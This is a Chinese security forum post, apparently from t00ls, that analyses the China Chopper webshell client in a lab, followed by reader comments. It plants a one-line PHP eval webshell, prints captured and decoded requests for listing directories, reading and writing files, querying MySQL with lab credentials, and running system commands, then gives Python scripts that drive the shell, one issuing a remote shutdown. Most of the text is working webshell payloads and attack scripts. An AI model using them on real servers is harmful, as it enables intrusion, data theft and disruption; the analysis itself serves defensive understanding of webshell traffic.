菜刀工作原理分析

2014-11-02 15:20:11 45 Woodisgood! 23327 12

环境：
1. xp1:192.168.110.132(受害机)
PHPnow 1.5.6
Wireshark1.12.0
2. xp2:192.168.110.129(攻击机)
中国菜刀20100812
3. Kali:192.168.110.128
Python 2.7.3
过程
首先，我们在xp1中的web目录下写入一句话<?php eval($_POST[‘wood’]);?>，保存为1.php。
然后我们用菜刀连接上，并配置好数据库管理信息。
0x01目录管理
我们在xp1抓包获取如下信息：

POST /1.php HTTP/1.1

X-Forwarded-For: 199.1.88.29

Referer: http://192.168.110.132

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0

Host: 192.168.110.132

Content-Length: 744

Cache-Control: no-cache



wood=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7&z1=QzpcXFBIUG5vdy0xLjUuNi40MjM3NDkzNzM2XFxodGRvY3NcXA%3D%3D

很明显是经过url编码，和base64编码，我们对其进行解码得到如下信息：

wood=@eval(base64_decode($_POST[z0]));

&z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;//关闭错误信息显示，关闭执行时间限制，关闭魔术引号

$D=base64_decode($_POST["z1"]); 

$F=@opendir($D);

if($F==NULL)

{

echo("ERROR:// Path Not Found Or No Permission!");

}

else

{

$M=NULL;$L=NULL;

while($N=@readdir($F))

{

$P=$D."/".$N;

$T=@date("Y-m-d H:i:s",@filemtime($P));

@$E=substr(base_convert(@fileperms($P),10,8),-4);

$R="\t".$T."\t".@filesize($P)."\t".$E."";

if(@is_dir($P))

$M.=$N."/".$R;

else 

$L.=$N.$R;

}

echo $M.$L;

@closedir($F);

};

echo("|<-");

die();

&z1=C:\\PHPnow-1.5.6.4237493736\\htdocs\\

0x02下载文件
我们从xp1上下载1.txt，其内容为test。
抓包信息：

POST /1.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: http://192.168.110.132

User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0

Host: 192.168.110.132

Content-Length: 472

Cache-Control: no-cache



wood=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskRj1nZXRfbWFnaWNfcXVvdGVzX2dwYygpP3N0cmlwc2xhc2hlcygkX1BPU1RbInoxIl0pOiRfUE9TVFsiejEiXTskZnA9QGZvcGVuKCRGLCJyIik7aWYoQGZnZXRjKCRmcCkpe0BmY2xvc2UoJGZwKTtAcmVhZGZpbGUoJEYpO31lbHNle2VjaG8oIkVSUk9SOi8vIENhbiBOb3QgUmVhZCIpO307ZWNobygifDwtIik7ZGllKCk7&z1=C%3A%5C%5CPHPnow-1.5.6.4237493736%5C%5Chtdocs%5C%5C1.txt

同样解码后得到信息：

wood=@eval(base64_decode($_POST[z0]));

&z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;

$F=get_magic_quotes_gpc()?stripslashes($_POST["z1"]):$_POST["z1"];

$fp=@fopen($F,"r");

if(@fgetc($fp))

{

@fclose($fp);@readfile($F);

}

else

{

echo("ERROR:// Can Not Read");

};

echo("|<-");die();

&z1=C:\\PHPnow-1.5.6.4237493736\\htdocs\\1.txt

0x03上传文件
我们从xp2上传一个名为1.png的图片到xp1上。。
抓包信息如下：

POST /1.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: http://192.168.110.132

User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0

Host: 192.168.110.132

Content-Length: 210271

Cache-Control: no-cache



&wood=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskZj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JGM9JF9QT1NUWyJ6MiJdOyRjPXN0cl9yZXBsYWNlKCJcciIsIiIsJGMpOyRjPXN0cl9yZXBsYWNlKCJcbiIsIiIsJGMpOyRidWY9IiI7Zm9yKCRpPTA7JGk8c3RybGVuKCRjKTskaSs9MikkYnVmLj11cmxkZWNvZGUoIiUiLnN1YnN0cigkYywkaSwyKSk7ZWNobyhAZndyaXRlKGZvcGVuKCRmLCJ3IiksJGJ1Zik%2FIjEiOiIwIik7O2VjaG8oInw8LSIpO2RpZSgpOw%3D%3D&z1=QzpcXFBIUG5vdy0xLjUuNi40MjM3NDkzNzM2XFxodGRvY3NcXDEucG5n&z2=89504E470D0A1A0A0000000D49484452000000230000001E0802000000295F307D00000006624B474400FF00FF00FFA0BDA793000000097048597300000EC400000EC401952B0E1B0000010B494441544889EDD73D8A85301000E09924164230B1F2069E417B3B6FE921AC3C8057F014064104F3F70A415CF7EDEE5BF42D5B64BA8461BEFC1499A0F77E18064484B7459EE70080DEFBBAAEBDF7EF93DAB60500060094D26D4A29358EE3751511D33495521E27D971A094EAFB9E3106D7C2185396E57792738E31B66FF1F5BAD334CDF30C0094D22449E23876CE9DD2AE2E1F00B4D6555565590600EBBA364D13C7F1E7B41B24E75C14455B7544B4D63E4D23D7A5172348410A52908214A4FF28DDF0E61242B4D6CBB200C0BAAE5F353C37485114755DB7772C42889F25428831E6B712220A218E80318690F3BD7C90A4944551DCD5593E91ACB55B75CE39E7FC22B3C7E978F0CF7E000F64E0671AD7A7382D0000000049454E44AE426082

解码得：

&wood=@eval(base64_decode($_POST[z0]));&z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;

$f=base64_decode($_POST["z1"]);

$c=$_POST["z2"];

$c=str_replace("\r","",$c);

$c=str_replace("\n","",$c);

$buf="";

for($i=0;$i<strlen($c);$i+=2)

$buf.=urldecode("%".substr($c,$i,2));

echo(@fwrite(fopen($f,"w"),$buf)?"1":"0");;

echo("|<-");die();&z1=C:\\PHPnow-1.5.6.4237493736\\htdocs\\1.png

&z2=89504E470D0A1A0A0000000D49484452000000230000001E0802000000295F307D00000006624B474400FF00FF00FFA0BDA793000000097048597300000EC400000EC401952B0E1B0000010B494441544889EDD73D8A85301000E09924164230B1F2069E417B3B6FE921AC3C8057F014064104F3F70A415CF7EDEE5BF42D5B64BA8461BEFC1499A0F77E18064484B7459EE70080DEFBBAAEBDF7EF93DAB60500060094D26D4A29358EE3751511D33495521E27D971A094EAFB9E3106D7C2185396E57792738E31B66FF1F5BAD334CDF30C0094D22449E23876CE9DD2AE2E1F00B4D6555565590600EBBA364D13C7F1E7B41B24E75C14455B7544B4D63E4D23D7A5172348410A52908214A4FF28DDF0E61242B4D6CBB200C0BAAE5F353C37485114755DB7772C42889F25428831E6B712220A218E80318690F3BD7C90A4944551DCD5593E91ACB55B75CE39E7FC22B3C7E978F0CF7E000F64E0671AD7A7382D0000000049454E44AE426082z2=89504E470D0A1A0A0000000D49484452000000230000001E0802000000295F307D00000006624B474400FF00FF00FFA0BDA793000000097048597300000EC400000EC401952B0E1B0000010B494441544889EDD73D8A85301000E09924164230B1F2069E417B3B6FE921AC3C8057F014064104F3F70A415CF7EDEE5BF42D5B64BA8461BEFC1499A0F77E18064484B7459EE70080DEFBBAAEBDF7EF93DAB60500060094D26D4A29358EE3751511D33495521E27D971A094EAFB9E3106D7C2185396E57792738E31B66FF1F5BAD334CDF30C0094D22449E23876CE9DD2AE2E1F00B4D6555565590600EBBA364D13C7F1E7B41B24E75C14455B7544B4D63E4D23D7A5172348410A52908214A4FF28DDF0E61242B4D6CBB200C0BAAE5F353C37485114755DB7772C42889F25428831E6B712220A218E80318690F3BD7C90A4944551DCD5593E91ACB55B75CE39E7FC22B3C7E978F0CF7E000F64E0671AD7A7382D0000000049454E44AE426082//z2为文件的16进制内容

0x04数据库管理
数据库dvwa,账号:root 密码:toor

执行：SHOW TABLES FROM `dvwa`
抓包信息：

POST /1.php HTTP/1.1

X-Forwarded-For: 199.1.88.29

Referer: http://192.168.110.132

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0

Host: 192.168.110.132

Content-Length: 741

Cache-Control: no-cache



wood=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskbT1nZXRfbWFnaWNfcXVvdGVzX2dwYygpOyRoc3Q9JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejEiXSk6JF9QT1NUWyJ6MSJdOyR1c3I9JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejIiXSk6JF9QT1NUWyJ6MiJdOyRwd2Q9JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejMiXSk6JF9QT1NUWyJ6MyJdOyRkYm49JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejQiXSk6JF9QT1NUWyJ6NCJdOyRUPUBteXNxbF9jb25uZWN0KCRoc3QsJHVzciwkcHdkKTskcT1AbXlzcWxfcXVlcnkoIlNIT1cgVEFCTEVTIEZST00gYHskZGJufWAiKTt3aGlsZSgkcnM9QG15c3FsX2ZldGNoX3JvdygkcSkpe2VjaG8odHJpbSgkcnNbMF0pLmNocig5KSk7fUBteXNxbF9jbG9zZSgkVCk7O2VjaG8oInw8LSIpO2RpZSgpOw%3D%3D&z1=localhost&z2=root&z3=toor&z4=dvwa

解码：

wood=@eval(base64_decode($_POST[z0]));&z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;

$m=get_magic_quotes_gpc();$hst=$m?stripslashes($_POST["z1"]):$_POST["z1"];

$usr=$m?stripslashes($_POST["z2"]):$_POST["z2"];

$pwd=$m?stripslashes($_POST["z3"]):$_POST["z3"];

$dbn=$m?stripslashes($_POST["z4"]):$_POST["z4"];

$T=@mysql_connect($hst,$usr,$pwd);

$q=@mysql_query("SHOW TABLES FROM `{$dbn}`");

while($rs=@mysql_fetch_row($q))

{

echo(trim($rs[0]).chr(9));

}

@mysql_close($T);;echo("|<-");

die();

&z1=localhost&z2=root&z3=toor&z4=dvwa

执行：SELECT * FROM `users` ORDER BY 1 DESC LIMIT 0,20

POST /1.php HTTP/1.1

X-Forwarded-For: 199.1.88.29

Referer: http://192.168.110.132

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0

Host: 192.168.110.132

Content-Length: 866

Cache-Control: no-cache



wood=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskbT1nZXRfbWFnaWNfcXVvdGVzX2dwYygpOyRoc3Q9JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejEiXSk6JF9QT1NUWyJ6MSJdOyR1c3I9JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejIiXSk6JF9QT1NUWyJ6MiJdOyRwd2Q9JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejMiXSk6JF9QT1NUWyJ6MyJdOyRkYm49JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejQiXSk6JF9QT1NUWyJ6NCJdOyR0YWI9JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejUiXSk6JF9QT1NUWyJ6NSJdOyRUPUBteXNxbF9jb25uZWN0KCRoc3QsJHVzciwkcHdkKTtAbXlzcWxfc2VsZWN0X2RiKCRkYm4pOyRxPUBteXNxbF9xdWVyeSgiU0hPVyBDT0xVTU5TIEZST00gYHskdGFifWAiKTt3aGlsZSgkcnM9QG15c3FsX2ZldGNoX3JvdygkcSkpe2VjaG8odHJpbSgkcnNbMF0pLiIgKCIuJHJzWzFdLiIpIi5jaHIoOSkpO31AbXlzcWxfY2xvc2UoJFQpOztlY2hvKCJ8PC0iKTtkaWUoKTs%3D&z1=localhost&z2=root&z3=toor&z4=dvwa&z5=users

解码：

wood=@eval(base64_decode($_POST[z0]));&z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;

$m=get_magic_quotes_gpc();$hst=$m?stripslashes($_POST["z1"]):$_POST["z1"];

$usr=$m?stripslashes($_POST["z2"]):$_POST["z2"];

$pwd=$m?stripslashes($_POST["z3"]):$_POST["z3"];

$dbn=$m?stripslashes($_POST["z4"]):$_POST["z4"];

$tab=$m?stripslashes($_POST["z5"]):$_POST["z5"];

$T=@mysql_connect($hst,$usr,$pwd);

@mysql_select_db($dbn);$q=@mysql_query("SHOW COLUMNS FROM `{$tab}`");

while($rs=@mysql_fetch_row($q)){echo(trim($rs[0])." (".$rs[1].")".chr(9));}@mysql_close($T);;

echo("|<-");

die();

&z1=localhost&z2=root&z3=toor&z4=dvwa&z5=users

执行：SELECT `user` FROM `users` ORDER BY 1 DESC LIMIT 0,10

POST /1.php HTTP/1.1

X-Forwarded-For: 199.1.88.29

Referer: http://192.168.110.132

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0

Host: 192.168.110.132

Content-Length: 1027

Cache-Control: no-cache



wood=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskbT1nZXRfbWFnaWNfcXVvdGVzX2dwYygpOyRoc3Q9JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejEiXSk6JF9QT1NUWyJ6MSJdOyR1c3I9JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejIiXSk6JF9QT1NUWyJ6MiJdOyRwd2Q9JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejMiXSk6JF9QT1NUWyJ6MyJdOyRkYm49JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejQiXSk6JF9QT1NUWyJ6NCJdOyRzcWw9YmFzZTY0X2RlY29kZSgkX1BPU1RbIno1Il0pOyRUPUBteXNxbF9jb25uZWN0KCRoc3QsJHVzciwkcHdkKTtAbXlzcWxfc2VsZWN0X2RiKCRkYm4pOyRxPUBteXNxbF9xdWVyeSgkc3FsKTskaT0wO3doaWxlKCRjb2w9QG15c3FsX2ZpZWxkX25hbWUoJHEsJGkpKXtlY2hvKCRjb2wuIlx0fFx0Iik7JGkrKzt9ZWNobygiXHJcbiIpO3doaWxlKCRycz1AbXlzcWxfZmV0Y2hfcm93KCRxKSl7Zm9yKCRjPTA7JGM8JGk7JGMrKyl7ZWNobyh0cmltKCRyc1skY10pKTtlY2hvKCJcdHxcdCIpO31lY2hvKCJcclxuIik7fUBteXNxbF9jbG9zZSgkVCk7O2VjaG8oInw8LSIpO2RpZSgpOw%3D%3D&z1=localhost&z2=root&z3=toor&z4=dvwa&z5=U0VMRUNUIGB1c2VyYCBGUk9NIGB1c2Vyc2AgT1JERVIgQlkgMSBERVNDIExJTUlUIDAsMTA%3D[/code="php"]解码：[code]wood=@eval(base64_decode($_POST[z0]));&z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;

$m=get_magic_quotes_gpc();

$hst=$m?stripslashes($_POST["z1"]):$_POST["z1"];

$usr=$m?stripslashes($_POST["z2"]):$_POST["z2"];

$pwd=$m?stripslashes($_POST["z3"]):$_POST["z3"];

$dbn=$m?stripslashes($_POST["z4"]):$_POST["z4"];

$sql=base64_decode($_POST["z5"]);

$T=@mysql_connect($hst,$usr,$pwd);

@mysql_select_db($dbn);

$q=@mysql_query($sql);

$i=0;

while($col=@mysql_field_name($q,$i))

{

echo($col."\t|\t");

$i++;

}

echo("\r\n");

while($rs=@mysql_fetch_row($q))

{        for($c=0;$c<$i;$c++)

{        echo(trim($rs[$c]));

echo("\t|\t");

}

echo("\r\n");

}

@mysql_close($T);;

echo("|<-");die();

&z1=localhost&z2=root&z3=toor&z4=dvwa&z5=SELECT `user` FROM `users` ORDER BY 1 DESC LIMIT 0,10

0x05虚拟终端
我们在菜刀的虚拟终端中执行：whoami
抓包信息：

POST /1.php HTTP/1.1

X-Forwarded-For: 199.1.88.29

Referer: http://192.168.110.132

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0

Host: 192.168.110.132

Content-Length: 550

Cache-Control: no-cache



wood=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyAneyRzfSciOiIvYyB7JHN9Ijskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIpOztlY2hvKCJ8PC0iKTtkaWUoKTs%3D&z1=Y21k&z2=Y2QgL2QgIkM6XFBIUG5vdy0xLjUuNi40MjM3NDkzNzM2XGh0ZG9jc1wiJndob2FtaSZlY2hvIFtTXSZjZCZlY2hvIFtFXQ%3D%3D

解码：

wood=@eval(base64_decode($_POST[z0]));&z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;

$p=base64_decode($_POST["z1"]);

$s=base64_decode($_POST["z2"]);

$d=dirname($_SERVER["SCRIPT_FILENAME"]);

$c=substr($d,0,1)=="/"?"-c '{$s}'":"/c {$s}";

$r="{$p} {$c}";

[url=https://www.t00ls.com/space-uid-5987.html]@system[/url]($r." 2>&1");;

echo("|<-");

die();

&z1=cmd&z2=cd /d "C:\PHPnow-1.5.6.4237493736\htdocs\"&whoami&echo [S]&cd&echo [E]

分析
通过上面的信息我们可以发现，菜刀是通过发送base64编码过后的php命令来实现操作的，
那么我们自然可以去模拟菜刀的功能，下面我用2个python脚本实现。
dir.py：

import urllib

params =urllib.urlencode({"wood":"@eval(base64_decode($_POST[z0]));","z0":"QGlua

V9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b

3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7J

EY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPc

iBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkR

ikpeyRQPSRELiIvIi4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c

3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiL

kBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlI

CRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7","z1

":"QzpcXFBIUG5vdy0xLjUuNi40MjM3NDkzNzM2XFxodGRvY3NcXA=="})

f = urllib.urlopen("http://192.168.110.132/1.php",params)

print f.read()

shutdown.py:

import urllib

params = urllib.urlencode({"wood":"@eval(base64_decode($_POST[z0]));","z0":"ZWNo

byBgc2h1dGRvd24gLXMgLXQgMGA7"})

f = urllib.urlopen("http://192.168.110.132/1.php",params)

f.read()

类别渗透测试

关于作者

Woodisgood!13篇文章191篇回复成都信息工程学院信息安全专业学生

评论45次

要评论？请先登录或注册

25楼

Andre
2014-11-8 11:22

前面的分析，前人早写过。后面的py挺好

回复|@ta|踩(0)|顶(0)
24楼

gou狗gou
2014-11-5 10:50

https://www.t00ls.com/thread-25587-1-1.html 这里也有人分析过了啊

回复|@ta|踩(0)|顶(0)
23楼

tools小强
2014-11-5 09:04

精神可嘉啊。非常明了。

回复|@ta|踩(0)|顶(0)
22楼

monkey_cici
2014-11-4 17:22

这种钻研的精神值得学xi

回复|@ta|踩(0)|顶(0)
21楼

核攻击
2014-11-4 15:47

不错不错，非常详细！

回复|@ta|踩(0)|顶(0)
20楼

_x_t_
2014-11-4 14:56

常乐村大神带我飞

回复|@ta|踩(0)|顶(0)
19楼

Woodisgood!
2014-11-4 14:35

laterain2：
Wood？小学弟？
回复|@ta
1

是我是我

回复|@ta|踩(0)|顶(0)
18楼

laterain2
2014-11-4 11:50

Wood？小学弟？

回复|@ta|踩(0)|顶(0)
17楼

Fiend
2014-11-4 09:29

谢谢分享

回复|@ta|踩(0)|顶(0)
16楼

AvckDr
2014-11-3 17:37

早就听闻成都信息工程学院很多大牛，今日一见果然不同凡响

回复|@ta|踩(0)|顶(0)
15楼

1260068056
2014-11-3 16:44

钻研的精神不错，不过这些有人发过了，在分析一些新的吧

回复|@ta|踩(0)|顶(0)
14楼

Woodisgood!
2014-11-3 15:26

hicams：
用wse抓的包吗？
回复|@ta
1

wireshark抓的

回复|@ta|踩(0)|顶(0)
13楼

bruce_eight
2014-11-3 14:14

有耐性, 哈哈啊还差文件操作了.

回复|@ta|踩(0)|顶(0)
12楼

hicams
2014-11-3 09:30

用wse抓的包吗？

回复|@ta|踩(0)|顶(0)
11楼

wsm123
2014-11-3 09:06

值得我们学xi

回复|@ta|踩(0)|顶(0)
10楼

Nc4
2014-11-3 00:50

楼主研究的很透彻好久以前好像也有人发过

回复|@ta|踩(0)|顶(0)
9楼

音符
2014-11-3 00:26

用来改写过waf的菜刀

回复|@ta|踩(0)|顶(0)
8楼

didiaoxiaofei
2014-11-2 22:28

学xi了，好详细。

回复|@ta|踩(0)|顶(0)
7楼

fjhgx
2014-11-2 21:29

菜刀的报文分析，以前见过

回复|@ta|踩(0)|顶(0)
6楼

intosec
2014-11-2 20:40

可以考虑把weevely分析一下

回复|@ta|踩(0)|顶(0)

菜刀工作原理分析

关于作者

评论45次

前面的分析，前人早写过。后面的py挺好

https://www.t00ls.com/thread-25587-1-1.html 这里也有人分析过了啊

精神可嘉啊 。非常明了。

这种钻研的精神 值得学xi

不错不错，非常详细！

常乐村大神带我飞

Wood？小学弟？

是我是我

Wood？ 小学弟？

谢谢分享

早就听闻成都信息工程学院很多大牛，今日一见果然不同凡响

钻研的精神不错，不过这些有人发过了，在分析一些新的吧

用wse抓的包吗？

wireshark抓的

有耐性, 哈哈啊 还差文件操作了.

用wse抓的包吗？

值得我们学xi

楼主研究的很透彻 好久以前好像也有人发过

用来改写过waf的菜刀

学xi了，好详细。

菜刀的报文分析，以前见过

可以考虑把weevely分析一下

热门文章

安全资讯Apex Legends 玩家担心 ALGS 黑客攻击后存在 RCE 缺陷

安全资讯号外号外！大家一定来看看！GitHub 骗局诱骗开发人员下载恶意软件

安全资讯美国悬赏 1500 万美元追捕 LockBit 勒索软件头目

渗透测试[已重新编辑]AI与基础安全结合的新的攻击面

渗透测试宝塔最新版本获取完整手机号

最新回复

精华推荐

手机无线我是如何随时随地控制全校宿舍楼大门的

渗透测试论如何优雅的注入Java Agent内存马

手机无线我是如何在不接触他人饭卡的情况下复制全校同学的饭卡

渗透测试WebShell系列(一)---XML

渗透测试分享一次渗透过程

精神可嘉啊。非常明了。

这种钻研的精神值得学xi

Wood？小学弟？

有耐性, 哈哈啊还差文件操作了.

楼主研究的很透彻好久以前好像也有人发过